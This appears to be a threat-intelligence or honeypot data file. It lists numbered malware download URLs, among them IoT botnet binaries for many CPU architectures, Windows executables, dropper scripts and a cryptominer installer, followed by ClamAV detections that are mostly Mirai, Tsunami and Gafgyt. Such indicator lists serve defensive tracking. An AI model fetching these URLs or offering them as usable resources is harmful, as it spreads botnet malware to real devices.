## 941 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
## 178 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
## 230 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
## 959 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 616 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 589 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
## 123 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
## 267 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
## 18 31.210.20.109/a-r.m-4.SNOOPY
## 788 31.210.20.109/a-r.m-5.SNOOPY
## 889 31.210.20.109/a-r.m-6.SNOOPY
## 486 31.210.20.109/a-r.m-7.SNOOPY
## 1132 31.210.20.109/a/76d32be0.sh
## 875 31.210.20.109/a/bot.arc
## 1037 31.210.20.109/a/bot.arm
## 317 31.210.20.109/a/bot.arm5
## 527 31.210.20.109/a/bot.arm6
## 956 31.210.20.109/a/bot.arm7
## 942 31.210.20.109/a/bot.i686
## 179 31.210.20.109/a/bot.m68k
## 229 31.210.20.109/a/bot.mips
## 960 31.210.20.109/a/bot.mpsl
## 615 31.210.20.109/a/bot.ppc
## 957 31.210.20.109/a/bot.rm7
## 590 31.210.20.109/a/bot.sh4
## 124 31.210.20.109/a/bot.spc
## 268 31.210.20.109/a/bot.x86
## 1129 31.210.20.109/a/index.html
## 1131 31.210.20.109/a/wget.sh
## 412 31.210.20.109/i-5.8-6.SNOOPY
## 940 31.210.20.109/m-i.p-s.SNOOPY
## 860 31.210.20.109/m-p.s-l.SNOOPY
## 17 31.210.20.109/p-p.c-.SNOOPY
## 789 31.210.20.109/s-h.4-.SNOOPY
## 25 31.210.20.109/x-3.2-.SNOOPY
## 216 31.210.20.109/x-8.6-.SNOOPY
## 809 34.133.16.87/jaws
## 829 34.133.16.87/x0ox0ox0oxDefault/z0r0.arc
## 232 34.133.16.87/x0ox0ox0oxDefault/z0r0.arm
## 585 34.133.16.87/x0ox0ox0oxDefault/z0r0.arm5
## 994 34.133.16.87/x0ox0ox0oxDefault/z0r0.arm6
## 501 34.133.16.87/x0ox0ox0oxDefault/z0r0.arm7
## 61 34.133.16.87/x0ox0ox0oxDefault/z0r0.i686
## 1161 34.133.16.87/x0ox0ox0oxDefault/z0r0.m68k
## 171 34.133.16.87/x0ox0ox0oxDefault/z0r0.mips
## 148 34.133.16.87/x0ox0ox0oxDefault/z0r0.mpsl
## 672 34.133.16.87/x0ox0ox0oxDefault/z0r0.ppc
## 1079 34.133.16.87/x0ox0ox0oxDefault/z0r0.sh4
## 846 34.133.16.87/x0ox0ox0oxDefault/z0r0.spc
## 995 34.133.16.87/x0ox0ox0oxDefault/z0r0.x86
## 905 360.lcy2zzx.pw/84/135.exe
## 135 360.lcy2zzx.pw/84/1433.exe
## 367 360.lcy2zzx.pw/84/25%.exe
## 142 360.lcy2zzx.pw/84/32.exe
## 618 360.lcy2zzx.pw/84/4445.exe
## 318 360.lcy2zzx.pw/84/64.exe
## 574 360.lcy2zzx.pw/84/bypass.vbs
## 617 360.lcy2zzx.pw/84/c445.exe
## 96 360.lcy2zzx.pw/84/cmd.exe
## 163 360.lcy2zzx.pw/84/d1lhots.exe
## 363 360.lcy2zzx.pw/84/JF.exe
## 217 360.lcy2zzx.pw/84/kqf2h.exe
## 1010 360.lcy2zzx.pw/84/lcy.ps1
## 192 360.lcy2zzx.pw/84/net.exe
## 1013 360.lcy2zzx.pw/84/QT1433.exe
## 122 360.lcy2zzx.pw/84/SQL.exe
## 125 360.lcy2zzx.pw/84/xmrig.exe
## 338 37.0.11.168/miori.arm
## 516 37.0.11.168/miori.arm5
## 519 37.0.11.168/miori.arm6
## 982 37.0.11.168/miori.arm7
## 1103 37.0.11.168/miori.mips
## 428 37.0.11.168/miori.mpsl
## 754 37.0.11.168/miori.ppc
## 156 37.0.11.168/miori.sh4
## 808 37.0.11.168/miori.x86
## 895 37.0.11.168/sh
## 158 43.251.17.160/server.exe
## 194 43.251.17.160/svchost.exe
## 857 43.251.17.160/svchst.exe
## 15 43.251.17.160/syn
## 1075 45.12.253.180/76d32be0.sh
## 67 45.12.253.180/77676d32be0.sh
## 224 45.12.253.180/883dremos.sh
## 1164 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.arc
## 452 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.arm
## 793 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 567 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 1030 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.arm7
## 1140 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.i686
## 916 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.m68k
## 478 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.mips
## 84 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 312 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 553 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.sh4
## 1168 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.spc
## 1050 45.12.253.180/a/db0fa4b8db0333367e9bda3ab68b8042.x86
## 1076 45.12.253.180/a/wget.sh
## 1165 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.arc
## 451 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.arm
## 791 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.arm5
## 568 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.arm6
## 1028 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.arm7
## 1139 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.i686
## 913 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.m68k
## 481 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.mips
## 86 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 313 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.ppc
## 552 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.sh4
## 1166 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.spc
## 1049 45.12.253.180/a/x3x38db0fa4b8db0333367e9bda3ab68b8042.x86
## 70 45.12.253.180/bin
## 1163 45.12.253.180/bot.arc
## 450 45.12.253.180/bot.arm
## 794 45.12.253.180/bot.arm5
## 1029 45.12.253.180/bot.arm7
## 1141 45.12.253.180/bot.i686
## 914 45.12.253.180/bot.m68k
## 479 45.12.253.180/bot.mips
## 87 45.12.253.180/bot.mpsl
## 314 45.12.253.180/bot.ppc
## 554 45.12.253.180/bot.sh4
## 1169 45.12.253.180/bot.spc
## 1047 45.12.253.180/bot.x86
## 1162 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.arc
## 449 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.arm
## 792 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 569 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 1031 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.arm7
## 1142 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.i686
## 915 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.m68k
## 480 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.mips
## 85 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 311 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 551 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.sh4
## 1167 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.spc
## 1048 45.12.253.180/db0fa4b8db0333367e9bda3ab68b8042.x86
## 69 45.12.253.180/jaws
## 68 45.12.253.180/wget.sh
## 71 45.12.253.180/wwgget.sh
## 197 45.81.39.72/arm
## 901 45.81.39.72/arm5
## 740 45.81.39.72/arm6
## 502 45.81.39.72/arm7
## 810 45.81.39.72/long.sh
## 64 45.81.39.72/m68k
## 993 45.81.39.72/mips
## 401 45.81.39.72/mpsl
## 95 45.81.39.72/ppc
## 899 45.81.39.72/sh4
## 1077 45.81.39.72/spc
## 619 45.81.39.72/x86
## 1011 45.81.39.72/x86_64
## 876 45.90.160.54/bins/onion002.arm
## 750 45.90.160.54/bins/onion002.arm5
## 852 45.90.160.54/bins/onion002.arm6
## 79 45.90.160.54/bins/onion002.arm7
## 421 45.90.160.54/bins/onion002.m68k
## 510 45.90.160.54/bins/onion002.mips
## 952 45.90.160.54/bins/onion002.mpsl
## 815 45.90.160.54/bins/onion002.ppc
## 28 45.90.160.54/bins/onion002.sh4
## 271 45.90.160.54/bins/onion002.spc
## 444 45.90.160.54/bins/onion002.x86
## 409 45.90.160.54/bins/sora1.sh
## 1092 45.90.160.54/onion002
## 472 45.90.161.105/bins/systemd
## 416 45.90.161.105/bins/ztx.arm
## 602 45.90.161.105/bins/ztx.arm5
## 408 45.90.161.105/bins/ztx.arm6
## 278 45.90.161.105/bins/ztx.arm7
## 168 45.90.161.105/bins/ztx.m68k
## 637 45.90.161.105/bins/ztx.mips
## 1126 45.90.161.105/bins/ztx.mpsl
## 1003 45.90.161.105/bins/ztx.ppc
## 951 45.90.161.105/bins/ztx.sh4
## 1020 45.90.161.105/bins/ztx.spc
## 245 45.90.161.105/bins/ztx.x86
## 758 45.95.55.202/reaper/reap.arch64
## 759 45.95.55.202/reaper/reap.arm
## 757 45.95.55.202/reaper/reap.arm4
## 777 45.95.55.202/reaper/reap.arm5
## 756 45.95.55.202/reaper/reap.arm6
## 763 45.95.55.202/reaper/reap.arm7
## 765 45.95.55.202/reaper/reap.arm7n
## 779 45.95.55.202/reaper/reap.armv51
## 776 45.95.55.202/reaper/reap.armv61
## 775 45.95.55.202/reaper/reap.armv71
## 766 45.95.55.202/reaper/reap.i386
## 770 45.95.55.202/reaper/reap.i486
## 761 45.95.55.202/reaper/reap.m68k
## 764 45.95.55.202/reaper/reap.mfs
## 767 45.95.55.202/reaper/reap.mips
## 768 45.95.55.202/reaper/reap.mips64
## 760 45.95.55.202/reaper/reap.mpsl
## 771 45.95.55.202/reaper/reap.powerpc
## 772 45.95.55.202/reaper/reap.ppc
## 762 45.95.55.202/reaper/reap.sh4
## 774 45.95.55.202/reaper/reap.sparc
## 840 45.95.55.202/reaper/reap.spc
## 780 45.95.55.202/reaper/reap.sysfs
## 773 45.95.55.202/reaper/reap.x64
## 769 45.95.55.202/reaper/reap.x86
## 778 45.95.55.202/reaper/reap.x86_64
## 992 45.95.55.214/a/wget.sh
## 341 45.95.55.214/scooter/bot.arm4
## 167 45.95.55.214/scooter/bot.arm5
## 78 45.95.55.214/scooter/bot.arm6
## 921 45.95.55.214/scooter/bot.arm7
## 667 45.95.55.214/scooter/bot.armv4eb
## 736 45.95.55.214/scooter/bot.armv4tl
## 609 45.95.55.214/scooter/bot.m68k
## 473 45.95.55.214/scooter/bot.mips
## 1027 45.95.55.214/scooter/bot.mips64
## 247 45.95.55.214/scooter/bot.mipsel
## 929 45.95.55.214/scooter/bot.powerpc
## 407 45.95.55.214/scooter/bot.ppc440
## 782 45.95.55.214/scooter/bot.sh4
## 374 45.95.55.214/scooter/bot.sparc
## 626 45.95.55.27/bins/arm
## 668 45.95.55.27/bins/arm5
## 604 45.95.55.27/bins/arm6
## 1157 45.95.55.27/bins/arm7
## 461 45.95.55.27/bins/m68k
## 601 45.95.55.27/bins/mips
## 1015 45.95.55.27/bins/mpsl
## 673 45.95.55.27/bins/ppc
## 33 45.95.55.27/bins/sh4
## 137 45.95.55.27/bins/spc
## 287 45.95.55.27/bins/x86
## 528 45.95.55.27/wget.sh
## 514 46.105.83.253/ok.sh
## 1035 46.19.137.50/miori.arc
## 200 46.19.137.50/miori.arm
## 599 46.19.137.50/miori.arm5
## 10 46.19.137.50/miori.arm6
## 13 46.19.137.50/miori.arm7
## 448 46.19.137.50/miori.i5
## 556 46.19.137.50/miori.i6
## 152 46.19.137.50/miori.m68k
## 90 46.19.137.50/miori.mips
## 132 46.19.137.50/miori.mpsl
## 72 46.19.137.50/miori.ppc
## 848 46.19.137.50/miori.sh4
## 386 46.19.137.50/miori.spc
## 966 46.19.137.50/miori.x86
## 1128 46.19.137.50/sh
## 6 46.19.141.122/adb
## 206 46.19.141.122/avtech
## 1125 46.19.141.122/bins/arc
## 726 46.19.141.122/bins/arm5
## 321 46.19.141.122/bins/arm6
## 304 46.19.141.122/bins/arm7
## 612 46.19.141.122/bins/i486
## 1062 46.19.141.122/bins/i686
## 371 46.19.141.122/bins/mips
## 1043 46.19.141.122/bins/mpsl
## 364 46.19.141.122/bins/ppc
## 827 46.19.141.122/bins/sh4
## 1100 46.19.141.122/bins/spc
## 709 46.19.141.122/bins/x86
## 989 46.19.141.122/comtrend
## 851 46.19.141.122/dlink
## 897 46.19.141.122/goahead
## 293 46.19.141.122/gpon443
## 747 46.19.141.122/gpon80
## 74 46.19.141.122/gpon8080
## 391 46.19.141.122/huawei
## 280 46.19.141.122/jaws
## 868 46.19.141.122/lg
## 594 46.19.141.122/netlink
## 109 46.19.141.122/realtek
## 575 46.19.141.122/soap
## 1057 46.19.141.122/sonicwall
## 1040 46.19.141.122/symantec
## 459 46.19.141.122/thinkphp
## 950 46.19.141.122/tr064
## 176 46.19.141.122/yarn
## 228 5.181.80.110/i686
## 270 5.181.80.110/m68k
## 492 5.181.80.110/mips
## 862 5.181.80.110/sh4
## 634 5.181.80.110/x86
## 659 5.188.210.227/80/echo.php
## 544 5.188.210.227/80/echo.php.1
## 1084 5.188.210.227/80/echo.php.2
## 1145 5.255.104.238/garm
## 1086 5.255.104.238/garm5
## 787 5.255.104.238/garm6
## 603 5.255.104.238/garm7
## 700 5.255.104.238/gmips
## 329 5.255.104.238/gmpsl
## 943 5.255.104.238/gppc
## 423 5.255.104.238/gsh4
## 883 51.81.133.91/FKKK/NW_BBB.arm
## 403 51.81.133.91/FKKK/NW_BBB.arm5
## 658 51.81.133.91/FKKK/NW_BBB.arm6
## 946 51.81.133.91/FKKK/NW_BBB.arm7
## 353 51.81.133.91/FKKK/NW_BBB.mips
## 417 51.81.133.91/FKKK/NW_BBB.sh4
## 719 51.81.133.91/FKKK/NW_BBB.x86
## 396 61.177.137.133/x/irq0
## 825 61.177.137.133/x/pty
## 717 61.177.137.133/x/tty0
## 605 61.177.137.133/x/tty1
## 378 61.177.137.133/x/tty2
## 669 61.177.137.133/x/tty3
## 835 61.177.137.133/x/tty4
## 830 61.177.137.133/x/tty5
## 369 61.177.137.133/x/tty6
## 291 74.201.28.102/idk/home.arc
## 399 74.201.28.102/idk/home.arm
## 400 74.201.28.102/idk/home.arm.1
## 20 74.201.28.102/idk/home.arm5
## 19 74.201.28.102/idk/home.arm5.1
## 288 74.201.28.102/idk/home.arm6
## 301 74.201.28.102/idk/home.arm7
## 370 74.201.28.102/idk/home.mips
## 298 74.201.28.102/idk/home.mpsl
## 89 74.201.28.102/idk/home.ppc
## 922 74.201.28.102/idk/home.sh4
## 558 74.201.28.102/idk/home.x86_64
## 1130 79.110.62.192/NIGarm
## 295 79.110.62.192/NIGarm5
## 186 79.110.62.192/NIGarm6
## 185 79.110.62.192/NIGarm7
## 1122 79.110.62.192/NIGm68k
## 996 79.110.62.192/NIGmips
## 744 79.110.62.192/NIGmpsl
## 77 79.110.62.192/NIGppc
## 1032 79.110.62.192/NIGsh4
## 945 79.110.62.192/NIGspc
## 334 79.110.62.192/NIGx86
## 1114 81.161.229.46/jaws
## 204 81.161.229.46/jaws.1
## 1022 81.161.229.46/ma/meihao.arc
## 63 81.161.229.46/ma/meihao.arm
## 243 81.161.229.46/ma/meihao.arm5
## 723 81.161.229.46/ma/meihao.arm6
## 923 81.161.229.46/ma/meihao.arm7
## 1127 81.161.229.46/ma/meihao.i686
## 821 81.161.229.46/ma/meihao.m68k
## 262 81.161.229.46/ma/meihao.mips
## 801 81.161.229.46/ma/meihao.mpsl
## 947 81.161.229.46/ma/meihao.ppc
## 54 81.161.229.46/ma/meihao.sh4
## 814 81.161.229.46/ma/meihao.spc
## 272 81.161.229.46/ma/meihao.x86
## 445 85.31.46.211/duck3k/home.arc
## 522 85.31.46.211/duck3k/home.arm
## 39 85.31.46.211/duck3k/home.arm5
## 733 85.31.46.211/duck3k/home.arm6
## 214 85.31.46.211/duck3k/home.arm7
## 879 85.31.46.211/duck3k/home.m68k
## 926 85.31.46.211/duck3k/home.mips
## 541 85.31.46.211/duck3k/home.mpsl
## 805 85.31.46.211/duck3k/home.ppc
## 112 85.31.46.211/duck3k/home.sh4
## 198 85.31.46.211/duck3k/home.spc
## 642 85.31.46.211/duck3k/home.x86
## 144 85.31.46.211/duck3k/home.x86_64
## 928 92.118.230.134/garm7
## 506 92.118.230.233/idk/home.arc
## 749 92.118.230.233/idk/home.arm
## 1026 92.118.230.233/idk/home.arm5
## 1041 92.118.230.233/idk/home.arm6
## 1175 92.118.230.233/idk/home.arm7
## 562 92.118.230.233/idk/home.m68k
## 580 92.118.230.233/idk/home.mips
## 896 92.118.230.233/idk/home.mpsl
## 424 92.118.230.233/idk/home.ppc
## 259 92.118.230.233/idk/home.sh4
## 933 92.118.230.233/idk/home.spc
## 462 92.118.230.233/idk/home.x86
## 388 92.207.203.157/x/2sh
## 397 92.207.203.157/x/irq0
## 716 92.207.203.157/x/tty0
## 607 92.207.203.157/x/tty1
## 376 92.207.203.157/x/tty2
## 671 92.207.203.157/x/tty3
## 837 92.207.203.157/x/tty4
## 832 92.207.203.157/x/tty5
## 549 95.214.53.214/miori.arc
## 1116 95.214.53.214/miori.arm
## 799 95.214.53.214/miori.arm5
## 500 95.214.53.214/miori.arm6
## 499 95.214.53.214/miori.arm7
## 937 95.214.53.214/miori.i5
## 529 95.214.53.214/miori.i6
## 560 95.214.53.214/miori.m68k
## 120 95.214.53.214/miori.mips
## 249 95.214.53.214/miori.mpsl
## 804 95.214.53.214/miori.ppc
## 885 95.214.53.214/miori.sh4
## 1109 95.214.53.214/miori.spc
## 165 95.214.53.214/miori.x86
## 628 95.214.53.214/shr
## 739 amkbins.duckdns.org/bins/ascaris.arc
## 322 amkbins.duckdns.org/bins/ascaris.arm
## 257 amkbins.duckdns.org/bins/ascaris.arm5
## 903 amkbins.duckdns.org/bins/ascaris.arm6
## 741 amkbins.duckdns.org/bins/ascaris.arm7
## 1078 amkbins.duckdns.org/bins/ascaris.i486
## 707 amkbins.duckdns.org/bins/ascaris.i686
## 151 amkbins.duckdns.org/bins/ascaris.m68k
## 196 amkbins.duckdns.org/bins/ascaris.mips
## 1133 amkbins.duckdns.org/bins/ascaris.mpsl
## 1171 amkbins.duckdns.org/bins/ascaris.ppc
## 680 amkbins.duckdns.org/bins/ascaris.sh4
## 326 amkbins.duckdns.org/bins/ascaris.spc
## 967 amkbins.duckdns.org/bins/ascaris.x86
## 34 amkbins.duckdns.org/bins/ascaris.x86_64
## 608 amkbins.duckdns.org/dlink
## 41 baidu.honker.info/8/86.exe
## 24 baidu.honker.info/8/c64.exe
## 384 baidu.honker.info/8/iexplore.exe
## 264 baidu.honker.info/8/index.html
## 1115 botnet.psscc.cn/jaws
## 712 bots.infectedfam.cc/index.html
## 49 download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh
## 720 heylitimysun.top/apacheqw.sh
## 375 heylitimysun.top/jaws
## 115 heylitimysun.top/xmogu/xmogum.arc
## 36 heylitimysun.top/xmogu/xmogum.arm
## 1097 heylitimysun.top/xmogu/xmogum.arm5
## 925 heylitimysun.top/xmogu/xmogum.arm6
## 244 heylitimysun.top/xmogu/xmogum.arm7
## 379 heylitimysun.top/xmogu/xmogum.i686
## 22 heylitimysun.top/xmogu/xmogum.m68k
## 117 heylitimysun.top/xmogu/xmogum.mips
## 261 heylitimysun.top/xmogu/xmogum.mpsl
## 238 heylitimysun.top/xmogu/xmogum.ppc
## 880 heylitimysun.top/xmogu/xmogum.sh4
## 303 heylitimysun.top/xmogu/xmogum.spc
## 1019 heylitimysun.top/xmogu/xmogum.x86
## 282 indonesias.me/9998/32.exe
## 62 indonesias.me/9998/c32.exe
## 134 ip.ws.126.net/80/ipquery
## 1073 jx.qingdaosheng.com/jaws
## 1107 kevincnc.madafaka.me/80/cometome
## 650 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.arc
## 662 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.arm
## 624 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.arm5
## 173 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.arm6
## 57 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.arm7
## 818 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.i486
## 820 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.i686
## 418 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.m68k
## 678 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.mips
## 1153 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.mpsl
## 849 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.ppc
## 332 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.sh4
## 1023 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.spc
## 987 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.x86
## 697 kevincnc.madafaka.me/80/k13msmfs2/00100001010001001000001001.x86_64
## 856 networkmapping.xyz/jaws
## 246 neverwinwlaq.xyz/jaws
## 82 neverwinwlaq.xyz/nwww/nww.arm
## 392 neverwinwlaq.xyz/nwww/nww.arm5
## 503 neverwinwlaq.xyz/nwww/nww.arm6
## 823 neverwinwlaq.xyz/nwww/nww.arm7
## 105 neverwinwlaq.xyz/nwww/nww.mips
## 315 neverwinwlaq.xyz/nwww/nww.mpsl
## 633 neverwinwlaq.xyz/nwww/nww.ppc
## 485 neverwinwlaq.xyz/nwww/nww.x86
## 1091 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
## 35 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
## 187 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 698 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 470 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
## 359 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
## 191 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
## 645 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
## 948 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 252 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 859 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
## 1045 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
## 1017 proxy.akur.group/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
## 1014 proxy.akur.group/jaws
## 474 Sakura/a-r.m-4.Sakura
## 786 Sakura/a-r.m-5.Sakura
## 661 Sakura/a-r.m-6.Sakura
## 1093 Sakura/a-r.m-7.Sakura
## 446 Sakura/i-5.8-6.Sakura
## 348 Sakura/m-6.8-k.Sakura
## 81 Sakura/m-i.p-s.Sakura
## 223 Sakura/m-p.s-l.Sakura
## 475 Sakura/p-p.c-.Sakura
## 476 Sakura/p-p.c-.Sakura.1
## 545 Sakura/s-h.4-.Sakura
## 838 Sakura/Sakura.sh
## 181 Sakura/x-3.2-.Sakura
## 755 Sakura/x-8.6-.Sakura
## 713 scan.infectedfam.cc/index.html
## 104 update.rawupdater.cf/jaws
## 76 v1.kannimanelaji.com/jaws
## 797 vzwebsite.ir/adb/adb.sh
## 207 vzwebsite.ir/fuez/potar.sh
## 1143 vzwebsite.ir/siffredi/dlz.arm4
## 222 vzwebsite.ir/siffredi/dlz.arm5
## 488 vzwebsite.ir/siffredi/dlz.arm6
## 442 vzwebsite.ir/siffredi/dlz.arm7
## 961 vzwebsite.ir/siffredi/dlz.armv4tl
## 205 vzwebsite.ir/siffredi/dlz.i586
## 269 vzwebsite.ir/siffredi/dlz.m68k
## 487 vzwebsite.ir/siffredi/dlz.mips
## 1151 vzwebsite.ir/siffredi/dlz.mips64
## 434 vzwebsite.ir/siffredi/dlz.mipsel
## 869 vzwebsite.ir/siffredi/dlz.powerpc
## 795 vzwebsite.ir/siffredi/dlz.ppc440
## 411 vzwebsite.ir/siffredi/dlz.sparc
## 349 vzwebsite.ir/siffredi/dlz.x86_64
## ClamAV
## 1055 Unix.Malware.Agent-7423818-0
## 455 OK
## 888 OK
## 47 OK
## 890 OK
## 366 OK
## 927 OK
## 732 OK
## 970 OK
## 162 OK
## 1021 OK
## 1154 OK
## 496 Unix.Trojan.Spike-6301360-0
## 383 Unix.Dropper.Mirai-7171431-0
## 45 OK
## 1060 OK
## 591 OK
## 1174 OK
## 870 OK
## 330 OK
## 254 OK
## 113 OK
## 902 OK
## 127 OK
## 886 OK
## 665 OK
## 320 Unix.Trojan.Tsunami-6981155-0
## 949 Unix.Trojan.Muhstik-7555544-0
## 652 Unix.Trojan.Tsunami-6981155-0
## 534 Unix.Trojan.Tsunami-6981155-0
## 92 Unix.Trojan.Tsunami-6981155-0
## 170 Unix.Trojan.Tsunami-6981155-0
## 294 Unix.Trojan.Muhstik-7555544-0
## 812 Unix.Trojan.Muhstik-7555544-0
## 239 OK
## 395 Unix.Trojan.Mirai-9942909-0
## 335 Unix.Trojan.Mirai-9942909-0
## 88 Unix.Trojan.Mirai-9942909-0
## 1099 Unix.Dropper.Mirai-7135925-0
## 1089 Unix.Trojan.Mirai-6981989-0
## 385 Unix.Trojan.Mirai-9942909-0
## 1173 Unix.Trojan.Mirai-9942909-0
## 420 Unix.Dropper.Mirai-7135957-0
## 188 Unix.Dropper.Mirai-7136288-0
## 611 Unix.Trojan.Mirai-9942909-0
## 266 Unix.Trojan.Mirai-9942909-0
## 1119 Unix.Trojan.Mirai-9943114-0
## 1064 Unix.Trojan.Mirai-9943114-0
## 751 Unix.Trojan.Mirai-9943114-0
## 296 Unix.Dropper.Mirai-7135925-0
## 202 Unix.Trojan.Mirai-6981989-0
## 215 Unix.Trojan.Mirai-9943114-0
## 60 Unix.Trojan.Mirai-9943114-0
## 790 Unix.Dropper.Mirai-7135957-0
## 297 Unix.Trojan.Mirai-7138377-0
## 161 Unix.Trojan.Mirai-9943114-0
## 593 Unix.Trojan.Mirai-9943114-0
## 1150 Unix.Dropper.Mirai-7360510-0
## 620 Unix.Dropper.Mirai-7360510-0
## 513 Unix.Dropper.Mirai-7360510-0
## 234 Unix.Dropper.Mirai-7135925-0
## 466 Unix.Trojan.Mirai-6981989-0
## 456 Unix.Dropper.Mirai-7360510-0
## 439 Unix.Dropper.Mirai-7360510-0
## 1066 Unix.Dropper.Mirai-7135957-0
## 140 Unix.Trojan.Mirai-7138377-0
## 724 Unix.Dropper.Mirai-7360510-0
## 40 OK
## 735 Unix.Dropper.Mirai-7360510-0
## 1120 OK
## 1149 Unix.Dropper.Mirai-7360510-0
## 621 Unix.Dropper.Mirai-7360510-0
## 512 Unix.Dropper.Mirai-7360510-0
## 235 Unix.Dropper.Mirai-7135925-0
## 467 Unix.Trojan.Mirai-6981989-0
## 457 Unix.Dropper.Mirai-7360510-0
## 440 Unix.Dropper.Mirai-7360510-0
## 1065 Unix.Dropper.Mirai-7135957-0
## 141 Unix.Trojan.Mirai-7138377-0
## 725 Unix.Dropper.Mirai-7360510-0
## 734 Unix.Dropper.Mirai-7360510-0
## 932 Unix.Dropper.Mirai-7139232-0
## 582 Unix.Dropper.Mirai-7139232-0
## 566 Unix.Dropper.Mirai-7139232-0
## 14 OK
## 546 Unix.Dropper.Mirai-7139232-0
## 971 Unix.Dropper.Mirai-7139232-0
## 588 Unix.Dropper.Mirai-7139232-0
## 622 Unix.Dropper.Mirai-7139232-0
## 930 Unix.Dropper.Mirai-7139232-0
## 931 Unix.Dropper.Mirai-7139232-0
## 405 Unix.Dropper.Mirai-7136288-0
## 242 Unix.Trojan.Gafgyt-6981156-0
## 53 Unix.Dropper.Mirai-7139232-0
## 573 Unix.Trojan.Mirai-9894781-0
## 705 Unix.Trojan.Mirai-9894781-0
## 1051 OK
## 107 Unix.Trojan.Mirai-6981989-0
## 845 OK
## 980 OK
